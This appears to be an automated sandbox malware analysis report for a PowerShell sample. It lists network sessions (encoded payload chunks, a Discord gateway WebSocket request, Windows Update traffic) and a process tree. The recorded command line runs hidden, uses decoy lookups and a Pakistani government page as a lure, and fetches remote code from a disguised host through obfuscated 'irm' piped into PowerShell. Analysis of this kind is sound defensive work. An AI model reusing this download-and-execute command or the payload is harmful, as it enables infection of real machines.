                                                                                                                    Data Ascii: AAAA$AAAAA$AAAAA$AABAA$ABALn$JlbG9$jAAAM$AAAAA$KAIAA$ACAAA$AVggA$AAAAA$AAAAA$AAAAA$AQAAA$QgAAA$AAAAA$AAAAA$AAAAA$AACQb$ggAAA$AAAEg$AAAAC$AAUAi$M8FAC$w8AgA$BAAAA$AAAAA$LQLCA$D6XwA$Alm0I$AIAAA$AAAAA$AAAAA$AAAAA$AAAAA$AAAAA$AAAAA$AAAAA$AAAAA$AAAAB$MwAwD$MAAA
                                                                                                                    2024-09-30 16:58:30 UTC1369INData Raw: 41 42 69 24 55 6d 67 41 55 24 41 41 41 51 67 24 41 41 41 41 41 24 48 35 4a 41 67 24 41 45 65 77 6b 24 43 41 41 51 36 24 39 66 37 2f 2f 24 79 59 67 41 41 24 41 41 41 44 6a 24 71 2f 76 2f 2f 24 46 79 6a 6e 41 24 51 41 47 4a 53 24 61 41 41 77 41 24 41 42 43 41 44 24 41 41 41 41 66 24 6b 6b 43 41 41 24 52 37 48 67 49 24 41 42 44 72 4a 24 2f 76 2f 2f 4a 24 69 41 42 41 41 24 41 41 4f 4c 37 24 2b 2f 2f 38 41 24 4f 69 73 46 4b 24 47 77 33 4b 6c 24 34 41 4b 41 51 24 45 41 41 59 71 24 41 45 49 72 42 24 53 69 50 54 7a 24 5a 65 66 67 59 24 41 41 41 51 55 24 2f 67 45 71 41 24 41 41 41 4e 69 24 73 46 4b 41 52 24 61 52 46 6c 2b 24 42 67 41 41 42 24 43 6f 41 41 44 24 6f 72 42 53 69 24 73 35 69 35 67 24 41 43 68 57 41 24 77 41 47 4b 67 24 41 36 4b 77 55 24 6f 41 30 34 32
                                                                                                                    Data Ascii: ABi$UmgAU$AAAQg$AAAAA$H5JAg$AEewk$CAAQ6$9f7//$yYgAA$AAADj$q/v//$FyjnA$QAGJS$aAAwA$ABCAD$AAAAf$kkCAA$R7HgI$ABDrJ$/v//J$iABAA$AAOL7$+//8A$OisFK$Gw3Kl$4AKAQ$EAAYq$AEIrB$SiPTz$ZefgY$AAAQU$/gEqA$AAANi$sFKAR$aRFl+$BgAAB$CoAAD$orBSi$s5i5g$AChWA$wAGKg$A6KwU$oA042
                                                                                                                    2024-09-30 16:58:30 UTC1369INData Raw: 45 67 24 45 43 66 53 34 24 41 41 41 51 67 24 41 41 41 41 41 24 48 35 4a 41 67 24 41 45 65 31 55 24 43 41 41 51 35 24 68 76 2f 2f 2f 24 79 59 67 41 67 24 41 41 41 44 68 24 37 2f 2f 2f 2f 24 45 67 46 38 4c 24 51 41 41 42 42 24 49 42 4b 41 45 24 41 41 43 73 67 24 41 51 41 41 41 24 48 35 4a 41 67 24 41 45 65 7a 34 24 43 41 41 51 36 24 57 66 2f 2f 2f 24 79 59 67 41 51 24 41 41 41 44 68 24 4f 2f 2f 2f 2f 24 45 67 46 2b 68 24 77 49 41 42 43 24 69 6b 43 41 41 24 47 4a 53 5a 39 24 4c 51 41 41 42 24 43 41 44 41 41 24 41 41 4f 44 48 24 2f 2f 2f 38 54 24 4d 41 51 41 45 24 77 45 41 41 41 24 4d 41 41 42 45 24 72 42 53 68 6c 24 6e 41 67 76 49 24 41 49 41 41 41 24 44 2b 44 67 41 24 41 4f 41 41 41 24 41 41 44 2b 44 24 41 41 41 52 51 24 59 41 41 41 43 24 65 41 41 41 41 24
                                                                                                                    Data Ascii: Eg$ECfS4$AAAQg$AAAAA$H5JAg$AEe1U$CAAQ5$hv///$yYgAg$AAADh$7////$EgF8L$QAABB$IBKAE$AACsg$AQAAA$H5JAg$AEez4$CAAQ6$Wf///$yYgAQ$AAADh$O////$EgF+h$wIABC$ikCAA$GJSZ9$LQAAB$CADAA$AAODH$///8T$MAQAE$wEAAA$MAABE$rBShl$nAgvI$AIAAA$D+DgA$AOAAA$AAD+D$AAARQ$YAAAC$eAAAA$
                                                                                                                    2024-09-30 16:58:30 UTC1369INData Raw: 48 24 36 49 41 67 41 24 45 4b 4b 67 49 24 41 41 59 6c 4a 24 69 6f 53 41 42 24 38 4d 4b 43 41 24 41 41 41 5a 39 24 48 51 41 41 42 24 43 41 41 41 41 24 41 41 66 6b 6b 24 43 41 41 52 37 24 58 51 49 41 42 24 44 6f 37 2f 2f 24 2f 2f 4a 69 41 24 43 41 41 41 41 24 4f 44 44 2f 2f 24 2f 38 41 41 41 24 41 54 4d 41 51 24 41 37 67 41 41 24 41 41 59 41 41 24 42 45 72 42 53 24 68 5a 32 48 4d 24 2b 49 41 55 41 24 41 41 44 2b 44 24 67 41 41 4f 41 24 41 41 41 41 44 24 2b 44 41 41 41 24 52 51 59 41 41 24 41 41 46 41 41 24 41 41 66 77 41 24 41 41 47 73 41 24 41 41 41 79 41 24 41 41 41 57 51 24 41 41 41 4a 73 24 41 41 41 41 34 24 41 41 41 41 41 24 42 49 42 48 78 24 41 6f 49 41 41 24 41 42 6e 30 6d 24 41 41 41 45 49 24 41 45 41 41 41 24 42 2b 53 51 49 24 41 42 48 73 68 24 41
                                                                                                                    Data Ascii: H$6IAgA$EKKgI$AAYlJ$ioSAB$8MKCA$AAAZ9$HQAAB$CAAAA$AAfkk$CAAR7$XQIAB$Do7//$//JiA$CAAAA$ODD//$/8AAA$ATMAQ$A7gAA$AAYAA$BErBS$hZ2HM$+IAUA$AAD+D$gAAOA$AAAAD$+DAAA$RQYAA$AAFAA$AAfwA$AAGsA$AAAyA$AAAWQ$AAAJs$AAAA4$AAAAA$BIBHx$AoIAA$ABn0m$AAAEI$AEAAA$B+SQI$ABHsh$A
                                                                                                                    2024-09-30 16:58:30 UTC1369INData Raw: 24 42 71 41 41 41 24 41 56 67 41 41 24 41 44 6a 63 41 24 41 41 41 63 79 24 59 41 41 41 71 24 41 50 41 41 41 24 42 43 41 41 41 24 41 41 41 66 6b 24 6b 43 41 41 52 24 37 48 51 49 41 24 42 44 6d 6b 2f 24 2f 2f 2f 4a 69 24 41 43 41 41 41 24 41 4f 4a 6e 2f 24 2f 2f 39 7a 4a 24 77 41 41 43 6f 24 41 32 41 41 41 24 45 49 41 77 41 24 41 41 41 34 68 24 66 2f 2f 2f 33 24 4d 6f 41 41 41 24 4b 67 44 30 41 24 41 41 51 67 43 24 77 41 41 41 44 24 68 78 2f 2f 2f 24 2f 63 78 59 41 24 41 41 61 41 4e 24 77 41 41 42 43 24 41 44 41 41 41 24 41 4f 46 33 2f 24 2f 2f 38 71 66 24 67 55 41 41 41 24 53 41 4f 77 41 24 41 42 43 41 46 24 41 41 41 41 66 24 6b 6b 43 41 41 24 52 37 63 51 49 24 41 42 44 6b 2b 24 2f 2f 2f 2f 4a 24 69 41 4b 41 41 24 41 41 4f 44 50 24 2f 2f 2f 38 6f 24 69 77
                                                                                                                    Data Ascii: $BqAAA$AVgAA$ADjcA$AAAcy$YAAAq$APAAA$BCAAA$AAAfk$kCAAR$7HQIA$BDmk/$///Ji$ACAAA$AOJn/$//9zJ$wAACo$A2AAA$EIAwA$AAA4h$f///3$MoAAA$KgD0A$AAQgC$wAAAD$hx///$/cxYA$AAaAN$wAABC$ADAAA$AOF3/$//8qf$gUAAA$SAOwA$ABCAF$AAAAf$kkCAA$R7cQI$ABDk+$////J$iAKAA$AAODP$///8o$iw
                                                                                                                    2024-09-30 16:58:30 UTC1369INData Raw: 49 41 41 43 44 24 44 41 41 41 41 24 4b 49 30 41 41 24 41 59 6c 4a 6e 24 36 4c 41 67 41 24 45 4b 4c 51 49 24 41 41 59 6c 4a 24 68 4d 42 49 41 24 63 41 41 41 42 24 2b 53 51 49 41 24 42 48 74 4b 41 24 67 41 45 4f 56 24 7a 2f 2f 2f 38 24 6d 49 41 67 41 24 41 41 41 34 55 24 66 2f 2f 2f 79 24 69 52 41 41 41 24 47 4a 53 5a 2b 24 6a 77 49 41 42 24 43 6a 45 43 41 24 41 47 4a 53 59 24 54 41 79 41 46 24 41 41 41 41 66 24 6b 6b 43 41 41 24 52 37 61 67 49 24 41 42 44 6f 6f 24 2f 2f 2f 2f 4a 24 69 41 46 41 41 24 41 41 4f 42 33 24 2f 2f 2f 38 34 24 41 77 49 41 41 24 43 41 55 41 41 24 41 41 4f 41 37 24 2f 2f 2f 38 34 24 59 51 4d 41 41 24 43 41 5a 41 41 24 41 41 2f 67 34 24 43 41 44 6a 33 24 2f 76 2f 2f 66 24 6a 73 41 41 41 24 51 67 75 67 41 24 41 41 43 69 4e 24 41 41 41
                                                                                                                    Data Ascii: IAACD$DAAAA$KI0AA$AYlJn$6LAgA$EKLQI$AAYlJ$hMBIA$cAAAB$+SQIA$BHtKA$gAEOV$z///8$mIAgA$AAA4U$f///y$iRAAA$GJSZ+$jwIAB$CjECA$AGJSY$TAyAF$AAAAf$kkCAA$R7agI$ABDoo$////J$iAFAA$AAOB3$///84$AwIAA$CAUAA$AAOA7$///84$YQMAA$CAZAA$AA/g4$CADj3$/v//f$jsAAA$QgugA$AACiN$AAA
                                                                                                                    2024-09-30 16:58:30 UTC1369INData Raw: 41 42 44 6f 24 75 2f 50 2f 2f 24 4a 69 41 47 41 24 41 41 41 4f 43 24 50 38 2f 2f 39 24 2b 4f 77 41 41 24 42 43 41 79 41 24 51 41 41 4b 49 24 30 41 41 41 59 24 6c 4a 69 44 41 24 41 41 41 41 4b 24 49 30 41 41 41 24 59 6c 4a 6e 36 24 47 41 67 41 45 24 4b 4b 41 49 41 24 41 59 6c 4a 6f 24 41 37 41 41 41 24 45 49 41 63 41 24 41 41 41 34 36 24 2f 76 2f 2f 78 24 45 41 48 78 77 24 6f 6a 67 41 41 24 42 69 68 69 41 24 41 41 47 4a 53 24 59 6d 49 41 51 24 41 41 41 41 34 24 30 50 76 2f 2f 24 79 68 68 41 41 24 41 47 4a 53 59 24 54 41 43 41 42 24 41 41 41 41 66 24 6b 6b 43 41 41 24 52 37 48 67 49 24 41 42 44 71 7a 24 2b 2f 2f 2f 4a 24 69 41 42 41 41 24 41 41 4f 4b 6a 24 37 2f 2f 38 52 24 42 42 45 42 4b 24 49 38 41 41 41 24 59 6c 4a 6d 6b 24 2f 66 76 33 2f 24 2f 79 41 53
                                                                                                                    Data Ascii: ABDo$u/P//$JiAGA$AAAOC$P8//9$+OwAA$BCAyA$QAAKI$0AAAY$lJiDA$AAAAK$I0AAA$YlJn6$GAgAE$KKAIA$AYlJo$A7AAA$EIAcA$AAA46$/v//x$EAHxw$ojgAA$BihiA$AAGJS$YmIAQ$AAAA4$0Pv//$yhhAA$AGJSY$TACAB$AAAAf$kkCAA$R7HgI$ABDqz$+///J$iABAA$AAOKj$7//8R$BBEBK$I8AAA$YlJmk$/fv3/$/yAS
                                                                                                                    2024-09-30 16:58:30 UTC1369INData Raw: 4f 49 54 24 2f 2f 2f 38 53 24 41 42 38 38 4b 24 49 34 41 41 41 24 5a 39 30 51 41 24 41 42 43 41 42 24 41 41 41 41 66 24 6b 6b 43 41 41 24 52 37 51 67 49 24 41 42 44 70 69 24 2f 2f 2f 2f 4a 24 69 41 41 41 41 24 41 41 4f 46 66 24 2f 2f 2f 38 53 24 41 41 4a 39 30 24 77 41 41 42 43 24 41 41 41 41 41 24 41 66 6b 6b 43 24 41 41 52 37 4f 24 77 49 41 42 44 24 6f 37 2f 2f 2f 24 2f 4a 69 41 41 24 41 41 41 41 4f 24 44 44 2f 2f 2f 24 38 41 41 42 4d 24 77 42 41 42 42 24 41 41 41 41 45 24 51 41 41 45 52 24 49 41 4b 43 6f 24 41 41 41 6f 6c 24 4a 6e 31 54 41 24 41 41 45 45 67 24 41 43 66 56 51 24 41 41 41 51 53 24 41 42 39 41 4b 24 4e 6f 42 41 41 24 5a 39 55 67 41 24 41 42 42 49 41 24 66 46 4d 41 41 24 41 51 53 41 43 24 67 57 41 41 41 24 72 45 67 42 38 24 55 77 41 41 42
                                                                                                                    Data Ascii: OIT$///8S$AB88K$I4AAA$Z90QA$ABCAB$AAAAf$kkCAA$R7QgI$ABDpi$////J$iAAAA$AAOFf$///8S$AAJ90$wAABC$AAAAA$AfkkC$AAR7O$wIABD$o7///$/JiAA$AAAAO$DD///$8AABM$wBABB$AAAAE$QAAER$IAKCo$AAAol$Jn1TA$AAEEg$ACfVQ$AAAQS$AB9AK$NoBAA$Z9UgA$ABBIA$fFMAA$AQSAC$gWAAA$rEgB8$UwAAB
                                                                                                                    2024-09-30 16:58:30 UTC1369INData Raw: 41 49 24 41 42 43 69 6f 24 43 41 41 47 4a 24 53 59 71 45 67 24 41 44 66 64 6b 24 41 41 41 51 67 24 42 41 41 41 41 24 50 34 4f 41 51 24 41 34 73 50 2f 24 2f 2f 78 49 41 24 41 6e 33 59 41 24 41 41 45 49 41 24 55 41 41 41 41 24 34 6f 76 2f 2f 24 2f 78 49 41 48 24 31 51 6f 6a 67 24 41 41 42 6e 33 24 57 41 41 41 45 24 49 41 41 41 41 24 41 42 2b 53 51 24 49 41 42 48 73 24 4b 41 67 41 45 24 4f 59 44 2f 2f 24 2f 38 6d 49 41 24 41 41 41 41 41 24 34 64 66 2f 2f 24 2f 78 49 41 66 24 6f 63 43 41 41 24 51 6f 70 41 67 24 41 42 69 55 6d 24 66 64 63 41 41 24 41 51 67 41 41 24 41 41 41 48 35 24 4a 41 67 41 45 24 65 78 41 43 41 24 41 51 35 54 76 24 2f 2f 2f 79 59 24 67 41 51 41 41 24 41 44 68 44 2f 24 2f 2f 2f 45 67 24 42 38 31 77 41 24 41 42 42 49 41 24 4b 42 73 41 41 24
                                                                                                                    Data Ascii: AI$ABCio$CAAGJ$SYqEg$ADfdk$AAAQg$BAAAA$P4OAQ$A4sP/$//xIA$An3YA$AAEIA$UAAAA$4ov//$/xIAH$1Qojg$AABn3$WAAAE$IAAAA$AB+SQ$IABHs$KAgAE$OYD//$/8mIA$AAAAA$4df//$/xIAf$ocCAA$QopAg$ABiUm$fdcAA$AQgAA$AAAH5$JAgAE$exACA$AQ5Tv$///yY$gAQAA$ADhD/$///Eg$B81wA$ABBIA$KBsAA$


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    2192.168.2.849725162.159.135.2344437656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-09-30 16:58:32 UTC187OUTGET /?v=9&encording=json HTTP/1.1
                                                                                                                    Connection: Upgrade,Keep-Alive
                                                                                                                    Upgrade: websocket
                                                                                                                    Sec-WebSocket-Key: i9F8JFEBNmpiWmUy3hupXw==
                                                                                                                    Sec-WebSocket-Version: 13
                                                                                                                    Host: gateway.discord.gg
                                                                                                                    2024-09-30 16:58:32 UTC622INHTTP/1.1 404 Not Found
                                                                                                                    Date: Mon, 30 Sep 2024 16:58:32 GMT
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Adw%2Bq4xBey8KrRUkdZwumMc4C%2Fr%2FjYjlCM8dj92YIgwxoCDjQ0vx5ywEB7jDbdrX8w5%2BIaW21p%2FAQmWWs%2BPnQH%2BCAKsTowQvIkNItjzagRsLnjJzSNXIeNNuvISMrvCoTSLu3w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8cb5c2226fac0f41-EWR


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    3192.168.2.84972952.165.165.26443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-09-30 16:58:38 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=17PBEYOcBeLvKsF&MD=KVfEnAfS HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept: */*
                                                                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                    Host: slscr.update.microsoft.com
                                                                                                                    2024-09-30 16:58:38 UTC560INHTTP/1.1 200 OK
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Expires: -1
                                                                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                    ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                    MS-CorrelationId: 570ff00e-c2b8-4bc3-8bf4-10d96e5fe7fc
                                                                                                                    MS-RequestId: a1720d83-8b77-4d98-b117-60495011fead
                                                                                                                    MS-CV: ZlvuKnTHo0y9DiNQ.0
                                                                                                                    X-Microsoft-SLSClientCache: 2880
                                                                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Date: Mon, 30 Sep 2024 16:58:37 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 24490
                                                                                                                    2024-09-30 16:58:38 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                    Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                    2024-09-30 16:58:38 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                    Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    4192.168.2.84973252.165.165.26443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-09-30 16:59:15 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=17PBEYOcBeLvKsF&MD=KVfEnAfS HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept: */*
                                                                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                    Host: slscr.update.microsoft.com
                                                                                                                    2024-09-30 16:59:16 UTC560INHTTP/1.1 200 OK
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Expires: -1
                                                                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                    ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                    MS-CorrelationId: 29f02c4d-41ad-44c9-be22-62d008f083b5
                                                                                                                    MS-RequestId: e31538ef-5bae-47bf-8ce3-fac89858db58
                                                                                                                    MS-CV: JaZ06oYh1UeRvbeh.0
                                                                                                                    X-Microsoft-SLSClientCache: 1440
                                                                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Date: Mon, 30 Sep 2024 16:59:15 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 30005
                                                                                                                    2024-09-30 16:59:16 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                    Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                    2024-09-30 16:59:16 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                    Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                    Click to jump to process

                                                                                                                    Click to jump to process

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Click to jump to process

                                                                                                                    Target ID:0
                                                                                                                    Start time:12:58:18
                                                                                                                    Start date:30/09/2024
                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.ministryof.gov.pk; nslookup www.Elpson.com; nslookup www.mproton.com; start https://pmo.gov.pk/site/404; $did='enpont.xyz/'; &('i'+'r'+'m') http://ministryofficedownloadcloudserver.scre$did/78/|Powershell
                                                                                                                    Imagebase:0x7ff6cb6b0000
                                                                                                                    File size:452'608 bytes
                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:1
                                                                                                                    Start time:12:58:18
                                                                                                                    Start date:30/09/2024
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:3
                                                                                                                    Start time:12:58:20
                                                                                                                    Start date:30/09/2024
                                                                                                                    Path:C:\Windows\System32\PING.EXE
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\system32\PING.EXE" www.ministryof.gov.pk
                                                                                                                    Imagebase:0x7ff7fe300000
                                                                                                                    File size:22'528 bytes
                                                                                                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:true

                                                                                                                    Target ID:4
                                                                                                                    Start time:12:58:20
                                                                                                                    Start date:30/09/2024
                                                                                                                    Path:C:\Windows\System32\nslookup.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\system32\nslookup.exe" www.Elpson.com
                                                                                                                    Imagebase:0x7ff645190000
                                                                                                                    File size:89'600 bytes
                                                                                                                    MD5 hash:F2E3950C1023ACF80765C918791999C0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:true

                                                                                                                    Target ID:5
                                                                                                                    Start time:12:58:20
                                                                                                                    Start date:30/09/2024
                                                                                                                    Path:C:\Windows\System32\nslookup.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\system32\nslookup.exe" www.mproton.com
                                                                                                                    Imagebase:0x7ff645190000
                                                                                                                    File size:89'600 bytes
                                                                                                                    MD5 hash:F2E3950C1023ACF80765C918791999C0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:true

                                                                                                                    Target ID:7
                                                                                                                    Start time:12:58:21
                                                                                                                    Start date:30/09/2024
                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://pmo.gov.pk/site/404
                                                                                                                    Imagebase:0x7ff678760000
                                                                                                                    File size:3'242'272 bytes
                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:8
                                                                                                                    Start time:12:58:22
                                                                                                                    Start date:30/09/2024
                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                    Imagebase:0x7ff67e6d0000
                                                                                                                    File size:55'320 bytes
                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:9
                                                                                                                    Start time:12:58:22
                                                                                                                    Start date:30/09/2024
                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    Wow64 process (32bit):false
